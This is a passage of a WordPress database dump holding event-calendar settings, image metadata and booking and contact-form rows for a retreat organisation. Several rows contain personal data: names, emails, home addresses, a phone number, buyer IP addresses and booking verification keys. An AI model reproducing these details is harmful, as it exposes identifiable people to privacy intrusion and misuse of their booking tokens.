WP-Optimize'),(176620,267865,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:70773;s:12:\"smushed-size\";i:69910;s:15:\"savings-percent\";d:1.22;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:70773;s:10:\"compressed\";i:69910;}s:6:\"medium\";a:2:{s:8:\"original\";i:9380;s:10:\"compressed\";i:9314;}s:5:\"large\";a:2:{s:8:\"original\";i:55566;s:10:\"compressed\";i:55566;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6906;s:10:\"compressed\";i:6840;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:36716;s:10:\"compressed\";i:36716;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19105;s:10:\"compressed\";i:19105;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:28873;s:10:\"compressed\";i:28873;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:21206;s:10:\"compressed\";i:21206;}s:8:\"tileview\";a:2:{s:8:\"original\";i:23309;s:10:\"compressed\";i:23309;}}}'),(176621,267870,'_field_496','Lian Hong'),(176622,267870,'_field_497','Ng'),(176623,267870,'_field_498',''),(176624,267870,'_field_499','yihong712@yahoo.com'),(176625,267870,'_field_500','Block 816 Yishun Street 81 #08-712 Singapore 760816'),(176626,267870,'_field_501','SINGAPORE'),(176627,267870,'_field_502','Please Choose Your State'),(176628,267870,'_field_503','SG'),(176629,267870,'_field_505','Dear Sir, \nMy ID : 3181976\nMy Address was : Block 816 Yishun Street 81 #08-712 Singapore (760816)\nPlease update and Amend. \n\nThe letters are often sent to another address, please use the above address. \n\nMay the blessings be.'),(176630,267870,'_form_id','53'),(176631,267870,'_seq_num','6'),(176632,267871,'_field_450','Wingrove'),(176633,267871,'_field_451','Yarde'),(176634,267871,'_field_458','8049211576'),(176635,267871,'_field_452','kendallhill01@gmail.com'),(176636,267871,'_field_453','H I Retreat:'),(176637,267871,'_field_454','I would like some info on the upcoming H I Retreat '),(176638,267871,'_form_id','49'),(176639,267871,'_seq_num','10'),(177394,268012,'_wp_attached_file','2023/02/outlook-online-1.png'),(177395,268012,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:441;s:6:\"height\";i:818;s:4:\"file\";s:28:\"2023/02/outlook-online-1.png\";s:8:\"filesize\";i:97175;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"outlook-online-1-162x300.png\";s:5:\"width\";i:162;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23407;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"outlook-online-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12411;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"outlook-online-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37468;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"outlook-online-1-441x324.png\";s:5:\"width\";i:441;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58625;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"outlook-online-1-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47350;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"outlook-online-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43236;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176640,267872,'mec_color',''),(176641,267872,'mec_location_id','122'),(176642,267872,'mec_dont_show_map','0'),(176643,267872,'mec_organizer_id','1'),(176644,267872,'mec_read_more',''),(176645,267872,'mec_more_info',''),(176646,267872,'mec_more_info_title',''),(176647,267872,'mec_more_info_target','_self'),(176648,267872,'mec_cost',''),(176649,267872,'mec_currency','a:0:{}'),(176650,267872,'mec_additional_organizer_ids','a:0:{}'),(176651,267872,'mec_additional_location_ids','a:0:{}'),(176652,267872,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-26\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-26\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(176653,267872,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(176654,267872,'mec_certain_weekdays','a:0:{}'),(176655,267872,'mec_allday','0'),(176656,267872,'one_occurrence','0'),(176657,267872,'mec_hide_time','0'),(176658,267872,'mec_hide_end_time','0'),(176659,267872,'mec_comment',''),(176660,267872,'mec_timezone','global'),(176661,267872,'mec_countdown_method','global'),(176662,267872,'mec_public','1'),(176663,267872,'mec_start_date','2023-02-26'),(176664,267872,'mec_start_time_hour','10'),(176665,267872,'mec_start_time_minutes','30'),(176666,267872,'mec_start_time_ampm','AM'),(176667,267872,'mec_start_day_seconds','37800'),(176668,267872,'mec_end_date','2023-02-26'),(176669,267872,'mec_end_time_hour','11'),(176670,267872,'mec_end_time_minutes','30'),(176671,267872,'mec_end_time_ampm','AM'),(176672,267872,'mec_end_day_seconds','41400'),(176673,267872,'mec_repeat_status','0'),(176674,267872,'mec_repeat_type',''),(176675,267872,'mec_repeat_interval','1'),(176676,267872,'mec_repeat_end',''),(176677,267872,'mec_repeat_end_at_occurrences',''),(176678,267872,'mec_repeat_end_at_date',''),(176679,267872,'mec_advanced_days','a:0:{}'),(176680,267872,'mec_in_days',''),(176681,267872,'mec_not_in_days',''),(176682,267872,'mec_hourly_schedules','a:0:{}'),(176683,267872,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(176684,267872,'mec_tickets','a:0:{}'),(176685,267872,'mec_fees_global_inheritance','1'),(176686,267872,'mec_fees','a:0:{}'),(176687,267872,'mec_ticket_variations_global_inheritance','1'),(176688,267872,'mec_ticket_variations','a:0:{}'),(176689,267872,'mec_reg_fields_global_inheritance','1'),(176690,267872,'mec_reg_fields','a:0:{}'),(176691,267872,'mec_bfixed_fields','a:0:{}'),(176692,267872,'mec_op','a:0:{}'),(176693,267872,'mec_fields','a:0:{}'),(176694,267872,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(176695,267872,'mec_event_status','EventScheduled'),(176696,267872,'mec_moved_online_link',''),(176697,267872,'mec_cancelled_reason',''),(176698,267872,'mec_display_cancellation_reason_in_single_page',''),(176699,267872,'protect_children',''),(176700,267872,'passster_activate_global_protection',NULL),(176701,267872,'passster_activate_protection',NULL),(176702,267872,'passster_protection_type','password'),(176703,267872,'boldgrid_hide_page_title','0'),(176704,267872,'_thumbnail_id','265138'),(176707,267872,'_dp_original','266311'),(176706,267872,'boldgrid_in_page_containers','1'),(176708,267872,'_edit_lock','1675617448:2'),(176709,267872,'_edit_last','2'),(176710,265565,'boldgrid_in_page_containers','0'),(177028,267919,'mec_repeat_status','0'),(177005,267919,'mec_additional_organizer_ids','a:0:{}'),(177006,267919,'mec_additional_location_ids','a:0:{}'),(177007,267919,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-03-23\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-03-23\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(177008,267919,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(177009,267919,'mec_certain_weekdays','a:0:{}'),(177010,267919,'mec_allday','0'),(177011,267919,'one_occurrence','0'),(177012,267919,'mec_hide_time','0'),(177013,267919,'mec_hide_end_time','0'),(177014,267919,'mec_comment',''),(177015,267919,'mec_timezone','global'),(177016,267919,'mec_countdown_method','global'),(177017,267919,'mec_public','1'),(177018,267919,'mec_start_date','2023-03-23'),(177019,267919,'mec_start_time_hour','2'),(177020,267919,'mec_start_time_minutes','0'),(177021,267919,'mec_start_time_ampm','PM'),(177022,267919,'mec_start_day_seconds','50400'),(177023,267919,'mec_end_date','2023-03-23'),(177024,267919,'mec_end_time_hour','3'),(177025,267919,'mec_end_time_minutes','0'),(177026,267919,'mec_end_time_ampm','PM'),(177027,267919,'mec_end_day_seconds','54000'),(177186,267954,'mec_verified','1'),(177187,267954,'mec_verification_key','b008f6099d99c503517a643360c99d57'),(177188,267954,'mec_cancellation_key','c9239f466fe68c01244fcde11bddcf8d'),(177189,267954,'mec_confirmed','1'),(177190,267954,'mec_event_id','267730'),(177191,267954,'mec_date','1676197800:1676244600'),(177192,267954,'mec_ticket_id',',1,'),(177193,267954,'mec_booking_time','2023-02-12 10:24:37'),(177194,267954,'mec_all_dates','a:0:{}'),(178898,268184,'mec_confirmed','1'),(178897,268184,'mec_cancellation_key','c64fe388687627436ada5b3f6523def7'),(178894,268184,'mec_user_id','1000020'),(178895,268184,'mec_verified','1'),(178896,268184,'mec_verification_key','b483190b63d0af413b30f81530cfd589'),(178893,268184,'mec_transaction_id','SQN40282'),(176924,267918,'protect_children',''),(176925,267918,'mec_color',''),(176926,267918,'mec_location_id','166'),(176927,267918,'mec_dont_show_map','0'),(176928,267918,'mec_organizer_id','1'),(176929,267918,'mec_read_more',''),(176930,267918,'mec_more_info',''),(176931,267918,'mec_more_info_title',''),(176932,267918,'mec_more_info_target','_self'),(176933,267918,'mec_cost',''),(176934,267918,'mec_currency','a:0:{}'),(176935,267918,'mec_additional_organizer_ids','a:0:{}'),(176936,267918,'mec_additional_location_ids','a:0:{}'),(176937,267918,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-15\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-15\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(177195,267954,'mec_other_dates','a:0:{}'),(177196,267954,'mec_attention_time','1676197800:1676244600'),(177151,267952,'_field_496',' Uwamusi  \"Christianah\"'),(177152,267952,'_field_497','Ovabor'),(177153,267952,'_field_498','(165) 121-0001'),(177154,267952,'_field_499','uwamuhu@gmail.com'),(177155,267952,'_field_500','3127 Calvary Dr Apt D2'),(177156,267952,'_field_501','Raleigh'),(177157,267952,'_field_502','NC'),(177158,267952,'_field_503','US'),(177159,267952,'_field_505',' HI,\nl want to attend the HI retreat, can you send me the link to pre-registration, please?\n  Thanks'),(177160,267952,'_form_id','53'),(177161,267952,'_seq_num','7'),(177162,267953,'mec_transaction_id','TBK90038'),(177163,267953,'mec_user_id','1000068'),(177164,267953,'mec_verified','1'),(177165,267953,'mec_verification_key','bdef0baf1ce301fc2a1947a4b98ed76a'),(177166,267953,'mec_cancellation_key','691279bf0b1a88259b583cdfc9d1e4a9'),(177167,267953,'mec_confirmed','1'),(177168,267953,'mec_event_id','267730'),(177169,267953,'mec_date','1676197800:1676244600'),(177170,267953,'mec_ticket_id',',1,'),(177171,267953,'mec_booking_time','2023-02-12 07:53:48'),(177172,267953,'mec_all_dates','a:0:{}'),(177173,267953,'mec_other_dates','a:0:{}'),(177174,267953,'mec_attention_time','1676197800:1676244600'),(177175,267953,'mec_attention_time_start','1676197800'),(177176,267953,'mec_attention_time_end','1676244600'),(177177,267953,'mec_book_date_submit','20230212075348'),(177178,267953,'mec_booking_location','129'),(177179,267953,'mec_ticket_price_1','0'),(177180,267953,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"j_furmanek@msn.com\";s:4:\"name\";s:16:\"Justyna Furmanek\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"66.60.117.142\";}}'),(179329,268201,'_wp_attached_file','2023/03/newsletter-lg-1.png'),(177387,268006,'smush-complete','1'),(177388,268006,'smush-info','The file was compressed from 89.13 KB to 33.56 KB saving 62.35 percent using WP-Optimize'),(177389,268006,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:91272;s:12:\"smushed-size\";i:34364;s:15:\"savings-percent\";d:62.35;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:91272;s:10:\"compressed\";i:34364;}s:6:\"medium\";a:2:{s:8:\"original\";i:48236;s:10:\"compressed\";i:18296;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:19726;s:10:\"compressed\";i:7445;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:66950;s:10:\"compressed\";i:26287;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:50400;s:10:\"compressed\";i:19695;}s:8:\"tileview\";a:2:{s:8:\"original\";i:55400;s:10:\"compressed\";i:21699;}s:13:\"site_icon-270\";a:2:{s:8:\"original\";i:41816;s:10:\"compressed\";i:15392;}s:13:\"site_icon-192\";a:2:{s:8:\"original\";i:27026;s:10:\"compressed\";i:10065;}s:13:\"site_icon-180\";a:2:{s:8:\"original\";i:24806;s:10:\"compressed\";i:9059;}s:12:\"site_icon-32\";a:2:{s:8:\"original\";i:2676;s:10:\"compressed\";i:1837;}}}'),(177390,268005,'original-file','2023/02/favicon-g3-updraft-pre-smush-original.png'),(177391,268005,'smush-complete','1'),(177392,268005,'smush-info','The file was compressed from 102.56 KB to 33.58 KB saving 67.26 percent using WP-Optimize'),(177393,268005,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:105026;s:12:\"smushed-size\";i:34385;s:15:\"savings-percent\";d:67.26;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:105026;s:10:\"compressed\";i:34385;}s:6:\"medium\";a:2:{s:8:\"original\";i:48236;s:10:\"compressed\";i:18478;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:19726;s:10:\"compressed\";i:7445;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:66950;s:10:\"compressed\";i:26287;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:50400;s:10:\"compressed\";i:19695;}s:8:\"tileview\";a:2:{s:8:\"original\";i:55400;s:10:\"compressed\";i:21699;}}}'),(177184,267954,'mec_transaction_id','UFZ39610'),(177185,267954,'mec_user_id','1000030'),(177183,267953,'mec_gateway_label','Free'),(177181,267953,'mec_price','0'),(177182,267953,'mec_gateway','MEC_gateway_free'),(177791,268038,'protect_children',''),(179082,268193,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-13\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-13\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179081,268193,'mec_additional_location_ids','a:0:{}'),(179077,268193,'mec_more_info_target','_self'),(179078,268193,'mec_cost',''),(179079,268193,'mec_currency','a:0:{}'),(179080,268193,'mec_additional_organizer_ids','a:0:{}'),(179071,268193,'mec_location_id','165'),(179072,268193,'mec_dont_show_map','0'),(179073,268193,'mec_organizer_id','1'),(179074,268193,'mec_read_more',''),(179075,268193,'mec_more_info',''),(179076,268193,'mec_more_info_title',''),(177029,267919,'mec_repeat_type',''),(177030,267919,'mec_repeat_interval','1'),(177031,267919,'mec_repeat_end',''),(177032,267919,'mec_repeat_end_at_occurrences',''),(177033,267919,'mec_repeat_end_at_date',''),(177034,267919,'mec_advanced_days','a:0:{}'),(177035,267919,'mec_in_days',''),(177036,267919,'mec_not_in_days',''),(177037,267919,'mec_hourly_schedules','a:0:{}'),(177038,267919,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(177039,267919,'mec_tickets','a:0:{}'),(177040,267919,'mec_fees_global_inheritance','1'),(177041,267919,'mec_fees','a:0:{}'),(177042,267919,'mec_ticket_variations_global_inheritance','1'),(177043,267919,'mec_ticket_variations','a:0:{}'),(177044,267919,'mec_reg_fields_global_inheritance','1'),(177045,267919,'mec_reg_fields','a:0:{}'),(177046,267919,'mec_bfixed_fields','a:0:{}'),(177047,267919,'mec_op','a:0:{}'),(177048,267919,'mec_fields','a:0:{}'),(177049,267919,'mec_event_status','EventScheduled'),(177050,267919,'mec_moved_online_link',''),(177051,267919,'mec_cancelled_reason',''),(177052,267919,'mec_display_cancellation_reason_in_single_page',''),(177053,267919,'boldgrid_hide_page_title','0'),(177054,267919,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(177055,267919,'passster_activate_global_protection',NULL),(177056,267919,'passster_activate_protection',NULL),(177057,267919,'passster_protection_type','password'),(177060,267919,'_dp_original','266104'),(177059,267919,'boldgrid_in_page_containers','1'),(177061,267919,'_edit_lock','1678249125:2'),(177062,267919,'_edit_last','2'),(177063,267919,'_thumbnail_id','267578'),(177064,267921,'_wp_attached_file','2023/02/teacher-bg.jpg'),(177065,267921,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1440;s:6:\"height\";i:612;s:4:\"file\";s:22:\"2023/02/teacher-bg.jpg\";s:8:\"filesize\";i:110732;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"teacher-bg-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1664;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"teacher-bg-1024x435.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:435;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8988;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"teacher-bg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1038;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"teacher-bg-768x326.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:326;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5800;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"teacher-bg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2355;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"teacher-bg-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3659;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"teacher-bg-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2794;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"teacher-bg-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2596;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177249,267956,'mec_gateway_label','Free'),(179070,268193,'mec_color',''),(179069,268193,'protect_children',''),(179308,247345,'_wp_old_date','2023-02-06'),(179306,264901,'_wp_old_date','2023-02-06'),(179296,247330,'_wp_old_date','2023-02-06'),(177255,267672,'_edit_lock','1676319822:2'),(177404,268016,'original-file','2023/02/for-adding-full-email-updraft-pre-smush-original.png'),(177405,268016,'smush-complete','1'),(177406,268016,'smush-info','The file was compressed from 38.80 KB to 20.03 KB saving 48.38 percent using WP-Optimize'),(177407,268016,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39728;s:12:\"smushed-size\";i:20507;s:15:\"savings-percent\";d:48.38;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:39728;s:10:\"compressed\";i:20507;}s:6:\"medium\";a:2:{s:8:\"original\";i:8584;s:10:\"compressed\";i:4757;}s:5:\"large\";a:2:{s:8:\"original\";i:55448;s:10:\"compressed\";i:22018;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5146;s:10:\"compressed\";i:3157;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:37540;s:10:\"compressed\";i:15156;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:15038;s:10:\"compressed\";i:7277;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:24895;s:10:\"compressed\";i:10811;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:18691;s:10:\"compressed\";i:8593;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18855;s:10:\"compressed\";i:8389;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:89834;s:10:\"compressed\";i:35173;}}}'),(188211,268837,'mec_in_days',''),(188212,268837,'mec_not_in_days',''),(188210,268837,'mec_advanced_days','a:0:{}'),(177276,267974,'_field_179','Jorge '),(177895,268074,'_wp_attached_file','2023/02/waterfall-6-notxt-Final.jpg'),(177247,267956,'mec_price','0'),(177248,267956,'mec_gateway','MEC_gateway_free'),(177224,267955,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:5:\"Beth \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"35.136.41.82\";}}'),(177225,267955,'mec_price','0'),(177226,267955,'mec_gateway','MEC_gateway_free'),(177227,267955,'mec_gateway_label','Free'),(177228,267956,'mec_transaction_id','RMB80706'),(177229,267956,'mec_user_id','1000007'),(177230,267956,'mec_verified','1'),(177231,267956,'mec_verification_key','a325ba77659a0e48c2500a2d0fd59fdc'),(177232,267956,'mec_cancellation_key','a46b105704e1097139c334e60c385cb7'),(177233,267956,'mec_confirmed','1'),(177234,267956,'mec_event_id','267730'),(177235,267956,'mec_date','1676197800:1676244600'),(177236,267956,'mec_ticket_id',',1,'),(177237,267956,'mec_booking_time','2023-02-12 11:29:46'),(177238,267956,'mec_all_dates','a:0:{}'),(177239,267956,'mec_other_dates','a:0:{}'),(177240,267956,'mec_attention_time','1676197800:1676244600'),(177241,267956,'mec_attention_time_start','1676197800'),(177242,267956,'mec_attention_time_end','1676244600'),(177243,267956,'mec_book_date_submit','20230212112946'),(177244,267956,'mec_booking_location','129'),(177245,267956,'mec_ticket_price_1','0'),(177246,267956,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:19:\"William Massengale 